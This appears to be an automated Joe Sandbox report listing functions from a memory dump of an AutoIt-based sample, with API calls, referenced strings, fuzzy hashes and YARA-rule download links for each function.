Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt - $]]
API String ID: 2289894680-740035790
Opcode ID: dda16ea447d68900db9344282207c89d54c2ce9b555f8b7fdc61d528c8362fc2
Instruction ID: 22ef3b2cc6e937d081935e6cef365b32b987eb142741d70e514edf60b2c60d90
Opcode Fuzzy Hash: dda16ea447d68900db9344282207c89d54c2ce9b555f8b7fdc61d528c8362fc2
Instruction Fuzzy Hash: C041947160C308AAC715EB60DC45BDF77ECAFC4710F10492EF599921A1EB749A89CB92

Function 0091663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,0091668B,?,?,009162FA,?,00000001,?,?,00000000), ref: 0091664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0091665C
FreeLibrary.KERNEL32(00000000,?,?,0091668B,?,?,009162FA,?,00000001,?,?,00000000), ref: 0091666E

Strings

Wow64DisableWow64FsRedirection, xrefs: 00916656
kernel32.dll, xrefs: 00916642

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 1ab9c33f9f83fb84e9af6641b969b110f9276d4e2ebcefbc9ed2e3da5066681a
Instruction ID: 19285d12902ea67547334de201c5f590098e38554cc2f0dfeb3a161cbb80f1c7
Opcode Fuzzy Hash: 1ab9c33f9f83fb84e9af6641b969b110f9276d4e2ebcefbc9ed2e3da5066681a
Instruction Fuzzy Hash: 9EE0C236B1B6221BA2222725BC0CBEE762C9FC3F66B050215FC02E2210DFA0CD4280E5

Function 009158CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009158BE,SwapMouseButtons,00000004,?), ref: 009158EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009158BE,SwapMouseButtons,00000004,?), ref: 00915910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,009158BE,SwapMouseButtons,00000004,?), ref: 00915932

Strings

Control Panel\Mouse, xrefs: 009158ED

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 50bf66a6b58ed78b722013c44d33f78526d00be893e0afd362e47efeaca622a1
Instruction ID: e945c9fe0c6ffc3db9bbc30a6ea394583f8686bd1e9a7f17f05a8ef44d9d286e
Opcode Fuzzy Hash: 50bf66a6b58ed78b722013c44d33f78526d00be893e0afd362e47efeaca622a1
Instruction Fuzzy Hash: AC115A75611618FFDB218F64CC809EEB7BCEF41760B524419F802E7210E2319E81EBA1

Function 0091F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009648C6

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 173c9fe3a56403edeebbd01c94575ce26cb16ed83446f874f54747ac3434e346
Instruction ID: 5f887b10cf82b14aada9ab65b5890fbf2b78ca3596fcf177ffb97797a3599ce9
Opcode Fuzzy Hash: 173c9fe3a56403edeebbd01c94575ce26cb16ed83446f874f54747ac3434e346
Instruction Fuzzy Hash: 1FC2AB71E0421DCFCB24CF98C8A0BADB7B5BF49310F248569E919AB391D775AD81CB90

Function 00920340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 009215F2

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 96f2e571882906bf3253eac6132a5b45112bddbf58a58e3ca539b2b6be4d4393
Instruction ID: 759c1be59b7dcdc27cbe0ce373f4a3cdb228b639158356e216cbb6bd9131e9fb
Opcode Fuzzy Hash: 96f2e571882906bf3253eac6132a5b45112bddbf58a58e3ca539b2b6be4d4393
Instruction Fuzzy Hash: E7B26874A08360CFCB24CF18E490A2AB7E5BBD9300F14895DF99A8B356D775ED41CB92

Function 0093014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 009309D8

Part of subcall function 00933614: RaiseException.KERNEL32(?,?,?,009309FA,?,00000000,?,?,?,?,?,?,009309FA,00000000,009D9758,00000000), ref: 00933674

__CxxThrowException@8.LIBVCRUNTIME ref: 009309F5

Strings

Unknown exception, xrefs: 00930A02

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 43daf65127ff8e9782a6679a70387b55f23185eecbe58d359ba2c7f470b6e6c5
Instruction ID: 012f433bb73798645983f8b2ae7a5b6b2d984c4fa3ee35c8ee77102489061daf
Opcode Fuzzy Hash: 43daf65127ff8e9782a6679a70387b55f23185eecbe58d359ba2c7f470b6e6c5
Instruction Fuzzy Hash: B0F0C234D4420CBB8F00BAA8EC66B9E776C5EC0354F608121B928D65D2FB70EA55CED0

Function 009989B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00998D52
TerminateProcess.KERNEL32(00000000), ref: 00998D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00998F3A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: f0a30639527e00fb1ba377a1d7cd99729466cb9ffed7f442c91cd650ffb07aa0
Instruction ID: 14e343433233d053c50e0ce2e672fcdcc12b17a1de4bafb2baa613ecc216d8b9
Opcode Fuzzy Hash: f0a30639527e00fb1ba377a1d7cd99729466cb9ffed7f442c91cd650ffb07aa0
Instruction Fuzzy Hash: D5125A71A083419FDB14DF28C484B6ABBE5FF89314F14895DE8898B392DB31ED45CB92

Function 00912793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 0091327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009132AF
Part of subcall function 0091327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 009132B7
Part of subcall function 0091327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009132C2
Part of subcall function 0091327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009132CD
Part of subcall function 0091327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 009132D5
Part of subcall function 0091327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 009132DD

Part of subcall function 00913205: RegisterWindowMessageW.USER32(00000004,?,00912964), ref: 0091325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00912A0A
OleInitialize.OLE32 ref: 00912A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00953A0D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: dabb0583eafefb299ba2295037b6683dca57211174acb1c1b0cd541c29bf1cb6
Instruction ID: ecd6f79b2cd942f4bdaa2e93e24d0b9fdbaa5bf5c5f335b52814d1cc7531dde7
Opcode Fuzzy Hash: dabb0583eafefb299ba2295037b6683dca57211174acb1c1b0cd541c29bf1cb6
Instruction Fuzzy Hash: A771A1B192A3849E8799EF69AEE56553BECFB88300350412AE019CF3B1EF704C41EF54

Function 0092FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 009161A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00916299

KillTimer.USER32(?,00000001,?,?), ref: 0092FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0092FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0096FE33

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: a23eaa8f21f8578feb361699c8bb0dad49019d5ebd4bbfd6920d463eaeb71520
Instruction ID: bac4f77bb80dcbf39ab406378432d5e232307cd5271c34a15ec795717d02f0c8
Opcode Fuzzy Hash: a23eaa8f21f8578feb361699c8bb0dad49019d5ebd4bbfd6920d463eaeb71520
Instruction Fuzzy Hash: 35319871904754AFDB32CF2498657E6BBEC9F02708F0004AED5DA57181C3742A85DB51

Function 00948A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,0094894C,?,009D9CE8,0000000C), ref: 00948A84
GetLastError.KERNEL32(?,0094894C,?,009D9CE8,0000000C), ref: 00948A8E
__dosmaperr.LIBCMT ref: 00948AB9

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: e2d2140ed62394445b8f46853b1464348dad9ee32973569b0a8a1f2c49e11252
Instruction ID: 0185da995ade9a7afe8cce5705007f1eecd8bdb20f0836deaad2e229cc089c27
Opcode Fuzzy Hash: e2d2140ed62394445b8f46853b1464348dad9ee32973569b0a8a1f2c49e11252
Instruction Fuzzy Hash: 2D014E326151605BC6246374AC86F7F674D4FC2738F2A062AF8149B1D3DFB0CD809691

Function 0094970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,009497BA,FF8BC369,00000000,00000002,00000000), ref: 00949744
GetLastError.KERNEL32(?,009497BA,FF8BC369,00000000,00000002,00000000,?,00945ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00936F41), ref: 0094974E
__dosmaperr.LIBCMT ref: 00949755

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: a152d7ad242b3be2c770eea29b6567189768cdb66e49882ab9278f96f58d6fd1
Instruction ID: 90fc78891af8c852dc2b31288f2231369bbf999b231e7669b1befef352783784
Opcode Fuzzy Hash: a152d7ad242b3be2c770eea29b6567189768cdb66e49882ab9278f96f58d6fd1
Instruction Fuzzy Hash: E7012432634118ABCB159FA9DC46DAF3B2AEFC5330B240219F8118B190EA309E41DBD0

Function 0091F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0091F27B
DispatchMessageW.USER32(?), ref: 0091F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0091F29F
Sleep.KERNEL32(0000000A), ref: 0091F2B1
TranslateAcceleratorW.USER32(?,?,?), ref: 009632D8

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 0accba2341a15f9a48506170021ed1804e5deac4a76e13be32940e07d50b25ab
Instruction ID: 64455ac98bf29b80cb0322beb739b5566a970d0554ca58edc8833ae25b87ef66
Opcode Fuzzy Hash: 0accba2341a15f9a48506170021ed1804e5deac4a76e13be32940e07d50b25ab
Instruction Fuzzy Hash: 51F082706593889BE734CBA0DC99FDA33ACEF85300F104929F61AC70C0DB749588DB25

Function 00922B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00923006

Strings

CALL, xrefs: 00922FD6

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: b9d643364bb862adbe08154d493e0a2d82fe3dc9cb6cba7c74896257af288ace
Instruction ID: 3dddc488e13cba572951344fd4fe53ad8950b2bdea463499622ad941d538aac1
Opcode Fuzzy Hash: b9d643364bb862adbe08154d493e0a2d82fe3dc9cb6cba7c74896257af288ace
Instruction Fuzzy Hash: A4229A70608211AFC714DF24D894B2AFBF5BF88314F24895DF49A8B3A2D775E941CB92

Function 00921990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966d7decf63d69e7dd9a9f87c8808497e554690d3c61f6e5dcac540c113350b8
Instruction ID: 9404f4e692982f3c9a1e4193330fdf85caf6d2c85ce81e386304cf953d63dfed
Opcode Fuzzy Hash: 966d7decf63d69e7dd9a9f87c8808497e554690d3c61f6e5dcac540c113350b8
Instruction Fuzzy Hash: 4F32F130A00219DFDB20DF64E891BAEB7B9FF94310F148958F855AB2A1D735ED90CB91

Function 00913A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 0095413B

Part of subcall function 00915851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009155D1,?,?,00954B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00915871

Part of subcall function 00913A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00913A76

Strings

X, xrefs: 00954109

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 4a161e901c63a5c04e2e14996841fcd47e4e215962c988e700af3c0965e8262b
Instruction ID: 1bbc111094fd35c8d2987e03c62e575c6e70ff1c3d13ebf6df4d1e02b89cc451
Opcode Fuzzy Hash: 4a161e901c63a5c04e2e14996841fcd47e4e215962c988e700af3c0965e8262b
Instruction Fuzzy Hash: 94219371A0425C9BDB51DF94C805BEEBBFDAF89304F00805AE545A7241DBB89A898FA1

Function 0091396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00913A3C

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 6d50f8b8c3236d9d4d92baad6e2b537fee36155946b91aebd2dd05b86452b6eb
Instruction ID: d589fdd07a7d8a3bc147e9c381ecde22daf1b82aace112b4d3758ae2814fce32
Opcode Fuzzy Hash: 6d50f8b8c3236d9d4d92baad6e2b537fee36155946b91aebd2dd05b86452b6eb
Instruction Fuzzy Hash: 7F316D706187059FD720DF25D885797BBF8FF89708F00092EE5DA8B281E775A988CB52

Function 0091331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 0091333D

Part of subcall function 009132E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 009132FB
Part of subcall function 009132E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00913312

Part of subcall function 0091338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00913368,?), ref: 009133BB
Part of subcall function 0091338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00913368,?), ref: 009133CE
Part of subcall function 0091338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,009E2418,009E2400,?,?,?,?,?,?,00913368,?), ref: 0091343A
Part of subcall function 0091338B: SetCurrentDirectoryW.KERNEL32(?,00000001,009E2418,?,?,?,?,?,?,?,00913368,?), ref: 009134BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00913377

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: f6a6648dc392ff130cfa79a16b3cb669f5e4356cb679dcc3ee5d0d98a28f1a2c
Instruction ID: 5468a1cf23dd365a2f06af0bc082de23cee774a5434080e39b3cddfc703a35a6
Opcode Fuzzy Hash: f6a6648dc392ff130cfa79a16b3cb669f5e4356cb679dcc3ee5d0d98a28f1a2c
Instruction Fuzzy Hash: 6FF0547166C3889FD3006F70ED4AB6437A8A744B19F009915B5198E1E2CBB98991AF44

Function 0091CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0091CEEE

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 68057c83052243e4bdda940341ff49f4195b9f643efa909e18d57c757d234ca0
Instruction ID: 2def38120e81577239d85f3c4284846f403a57982a30d4e3647704fc7f1b0a9b
Opcode Fuzzy Hash: 68057c83052243e4bdda940341ff49f4195b9f643efa909e18d57c757d234ca0
Instruction Fuzzy Hash: 1F32AFB4A442499FDB20CF58C884EFAB7B9EF85354F188459F91AAB351C734ED81CB90

Function 00997AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

